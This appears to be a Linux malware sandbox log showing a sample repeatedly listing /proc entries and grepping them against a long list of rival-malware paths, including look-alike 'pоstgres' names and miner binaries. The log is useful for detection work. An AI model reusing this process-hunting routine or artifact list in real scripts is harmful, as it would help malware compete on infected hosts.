/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1049
-
-
/bin/grepgrep exe2⤵PID:1053
-
-
/bin/lsls -latrh /proc/7192⤵PID:1052
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1057
-
-
/bin/lsls -latrh /proc/722⤵PID:1060
-
-
/bin/grepgrep exe2⤵PID:1061
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1065
-
-
/bin/grepgrep exe2⤵PID:1068
-
-
/bin/lsls -latrh /proc/7232⤵PID:1067
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1072
-
-
/bin/grepgrep exe2⤵PID:1077
-
-
/bin/lsls -latrh /proc/7262⤵PID:1076
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1081
-
-
/bin/grepgrep exe2⤵PID:1084
-
-
/bin/lsls -latrh /proc/732⤵PID:1083
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1088
-
-
/bin/grepgrep exe2⤵PID:1091
-
-
/bin/lsls -latrh /proc/7312⤵PID:1090
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1094
-
-
/bin/grepgrep exe2⤵PID:1098
-
-
/bin/lsls -latrh /proc/742⤵PID:1097
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1101
-
-
/bin/grepgrep exe2⤵PID:1104
-
-
/bin/lsls -latrh /proc/7412⤵PID:1103
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1107
-
-
/bin/grepgrep exe2⤵PID:1110
-
-
/bin/lsls -latrh /proc/752⤵PID:1109
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1112
-
-
/bin/grepgrep exe2⤵PID:1115
-
-
/bin/lsls -latrh /proc/762⤵PID:1114
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1118
-
-
/bin/grepgrep exe2⤵PID:1121
-
-
/bin/lsls -latrh /proc/782⤵PID:1120
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1123
-
-
/bin/grepgrep exe2⤵PID:1126
-
-
/bin/lsls -latrh /proc/82⤵
- Reads runtime system information
PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1128
-
-
/bin/grepgrep exe2⤵PID:1131
-
-
/bin/lsls -latrh /proc/812⤵PID:1130
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1133
-
-
/bin/grepgrep exe2⤵PID:1136
-
-
/bin/lsls -latrh /proc/822⤵PID:1135
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1138
-
-
/bin/grepgrep exe2⤵PID:1141
-
-
/bin/lsls -latrh /proc/92⤵
- Reads runtime system information
PID:1140
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1143
-
-
/bin/grepgrep exe2⤵PID:1146
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1145
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1148
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1150
-
-
/bin/grepgrep exe2⤵PID:1151
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1153
-
-
/bin/grepgrep exe2⤵PID:1156
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1155
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1158
-
-
/bin/grepgrep exe2⤵PID:1161
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1160
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1163
-
-
/bin/grepgrep exe2⤵PID:1166
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1165
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1168
-
-
/bin/grepgrep exe2⤵PID:1171
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1170
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1173
-
-
/bin/grepgrep exe2⤵PID:1176
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1175
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1178
-
-
/bin/grepgrep exe2⤵PID:1181
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1180
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1183
-
-
/bin/grepgrep exe2⤵PID:1186
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1185
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1188
-
-
/bin/grepgrep exe2⤵PID:1191
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1190
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1193
-
-
/bin/grepgrep exe2⤵PID:1196
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1195
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1198
-
-
/bin/grepgrep exe2⤵PID:1201
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1203
-
-
/bin/grepgrep exe2⤵PID:1206
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1208
-
-
/bin/grepgrep exe2⤵PID:1211
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1210
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1213
-
-
/bin/grepgrep exe2⤵PID:1216
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1215
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1218
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1221
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1226
-
-
/bin/grepgrep exe2⤵PID:1229
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1228
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1231
-
-
/bin/grepgrep exe2⤵PID:1234
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1233
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1236
-
-
/bin/grepgrep exe2⤵PID:1239
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1238
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1241
-
-
/bin/grepgrep exe2⤵PID:1244
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1243
-
-
